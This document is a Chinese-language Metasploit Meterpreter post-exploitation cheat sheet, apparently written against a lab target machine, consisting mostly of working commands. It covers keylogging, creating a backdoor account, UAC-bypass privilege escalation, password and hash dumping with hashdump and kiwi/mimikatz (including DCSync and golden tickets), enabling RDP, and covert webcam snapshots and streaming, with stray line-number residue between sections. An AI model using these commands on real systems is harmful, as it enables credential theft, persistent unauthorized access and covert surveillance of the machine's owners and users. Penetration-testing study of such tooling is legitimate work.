后渗透操作_creds_all

1.文件交互指令

cat 读取文件内容

cd : 切换靶机目录
cp : 复制文件到目标
mv : 移动到目标
chmod : 修改文件权限（比如chmod 777 shell.elf）
del / rm : 删除靶机文件
dir : 打印靶机目录
mkdir : 在靶机上创建目录
rmdir : 删除靶机目录
edit : 编辑文件
getlwd : 打印本地目录
getwd : 打印靶机目录
lcd : 更改本地目录
lls : 列出本地目录
ls : 列出靶机文件目录
lpwd : 打印本地目录
pwd : 打印工作目录
search : 搜索文件 详情search -h

2、上传下载文件

上传
第一种：upload 文件名（需要在当前文件的文件夹下）

第二种：upload /文件地址/文件名

下载
download 文件名

3、屏幕截图

screenshot

4、键盘记录

keyscan_start：启动键盘记录(Windows)
keyscan_dump：导出键盘(Windows)
keyscan_stop：停止键盘记录(Windows)

5、创建帐户

查看目标靶机已存在用户
meterpreter中输入：

run post/windows/gather/enum_logged_on_users
1

使用getgui创建 一个用户名为 msb 密码为 123456 的账户

run getgui -u msb -p 123456

1
2

win的运行输入netplwiz 可以查看账户创建情况

6、提权

查看当前获得用户的权限：getuid
方法一：getsystem
方法二：使用msf模块提权

要想提权必须是已经拿到meterpreter  然后将当前meterpreter 后台 meterprerer中输入  background

1、 查看可用模块  MSF终端中输入   search bypassuac   查看提权模块

2、 选择一个适合当前系统的提权模块 
use  exploit/windows/local/bypassuac_windows_store_reg  
use exploit/windows/local/bypassuac_sluihijack
use exploit/windows/local/bypassuac_dotnet_profiler

3 配置模块使用参数   终端内输入： show options

4 可以看到需要配置 session  终端内输入：set session  {需要提权的session id}

5 执行提权  终端内输入：run

6 获取到meterpreter后  输入getuid 看实际还没有提权成功  需要在还终端内在输入 getsystem 获取权限 

7 获取权限完成后 输入getuid 即可看到  已经获取到SYSTEM 最高权限了


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

7、获取登录密码

首先需要获得一个有SYSTEM权限的meterpreter
1 抓取自动登录账户密码

run windows/gather/credentials/windows_autologin
1

如果提示这证明本机并没有配置自动登录
2 导出SAM数据库本地账户密码文件

run post/windows/gather/smart_hashdump
1

3 导出密码哈希

run hashdump
1

4 使用kiwi模块获取（没复现成功）
终端输入 load kiwi
creds_all 直接获取密码
使用 kiwi_cmd sekurlsa::logonpasswords 获取密码

kiwi参数和描述
creds_all：列举所有凭据                                
creds_kerberos：列举所有kerberos凭据                   
 creds_msv：列举所有msv凭据                             
creds_ssp：列举所有ssp凭据                             
creds_tspkg：列举所有tspkg凭据                         
 creds_wdigest：列举所有wdigest凭据                     
dcsync：通过DCSync检索用户帐户信息                     
 dcsync_ntlm：通过DCSync检索用户帐户NTLM散列、SID和RID  
golden_ticket_create：创建黄金票据                     
 kerberos_ticket_list：列举kerberos票据                 
kerberos_ticket_purge：清除kerberos票据                
 kerberos_ticket_use：使用kerberos票据                  
kiwi_cmd：执行mimikatz的命令，后面接mimikatz.exe的命令 
lsa_dump_sam：dump出lsa的SAM                           
lsa_dump_secrets：dump出lsa的密文                      
password_change：修改密码                              
wifi_list：列出当前用户的wifi配置文件                  
 wifi_list_shared：列出共享wifi配置文件/编码            
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

8、远程监控

1、使用rdesktop远程控制
说明：rdesktop是linux下支持Windows远程桌面连接的客户端程序，在linux系统下可通过它远程访问Windows桌面，支持多种版本。rdesktop是sourceforge下支持GPL协议的一个开源项目，采用RDP（Remote Desktop Protocol,远程桌面协议），几乎可以连接windows的所有版本

rdesktop常用参数

| id   | 参数        | 描述                                            |
| ---- | ----------- | ----------------------------------------------- |
| 1    | -u          | 账户名                                          |
| 2    | -p          | 密码                                            |
| 3    | -a 16       | 指使用16位色显示远程画面                        |
| 4    | -f          | 全屏模式（用**Ctrl+Alt+Enter** 组合键退出全屏） |
| 5    | -g          | 设置分辨率 如 :   -g 1024x768                   |
| 6    | rdesktop -h | 查看rdesktop使用帮助                            |
1
2
3
4
5
6
7
8
9
10

rdesktop -u 用户名 -p 密码 -f IP


如果远程计算机没有启动远程功能我们可以在meterpreter中输入

启动远程桌面协议：run post/windows/manage/enable_rdp

2、通过vnc远程

9、调用摄像头

靶机获取到meterpreter后我们可以使用 webcam模块实现调用软，硬件摄像头

webcam模块支持命令

| id   | 模块名            | 解释                                               |
| ---- | ----------------- | -------------------------------------------------- |
| 1    | **webcam_list**   | 列出靶机中的所有软，硬件摄像头列表，并编号         |
| 2    | **webcam_snap**   | 可调用单个软，硬件摄像头拍照，默认调用第一个摄像头 |
| 3    | **webcam_stream** | 可调用单个软，硬件摄像头直播，默认调用第一个摄像头 |
1
2
3
4
5
6
7

webcam_list

webcam_snap 调用单个软，硬件摄像头拍照

| id   | 参数 | 描述                                                         |
| ---- | ---- | ------------------------------------------------------------ |
| 1    | -h   | 显示帮助                                                     |
| 2    | -i   | -i 1 “1”代表调用摄像头编号                                   |
| 3    | -p   | -p  /root "root"设置存储路径                                 |
| 4    | -q   | -q  100  "100" 表示存储图片的质量默认为 50                   |
| 5    | -v   | -v  false   -v 2个参数  true 和  false   这个参数表示拍照后自动打开,默认参数为true |


1
2
3
4
5
6
7
8
9

webcam_stream 调用单个软，硬件摄像头直播

| id   | 参数 | 描述                                                         |
| ---- | ---- | ------------------------------------------------------------ |
| 1    | -h   | 显示帮助                                                     |
| 2    | -d   | -d 100  "100"=100秒   设置流持续时间为100秒   默认为1800     |
| 3    | -i   | -i 1 “1”代表调用摄像头编号                                   |
| 4    | -q   | -q 100  “100”指流质量 默认为50                               |
| 5    | -s   | -s live “live”指流文件路径  默认输出在当前目录（注意目录不存在不会自动创建） |
| 7    | -f   | -f live  “live”指播放文件的存储地址  默认输出在当前目录      |
| 8    | -v   | -v  false   -v 2个参数  true 和  false   这个参数表示拍照后自动打开,默认参数为true |
1
2
3
4
5
6
7
8
9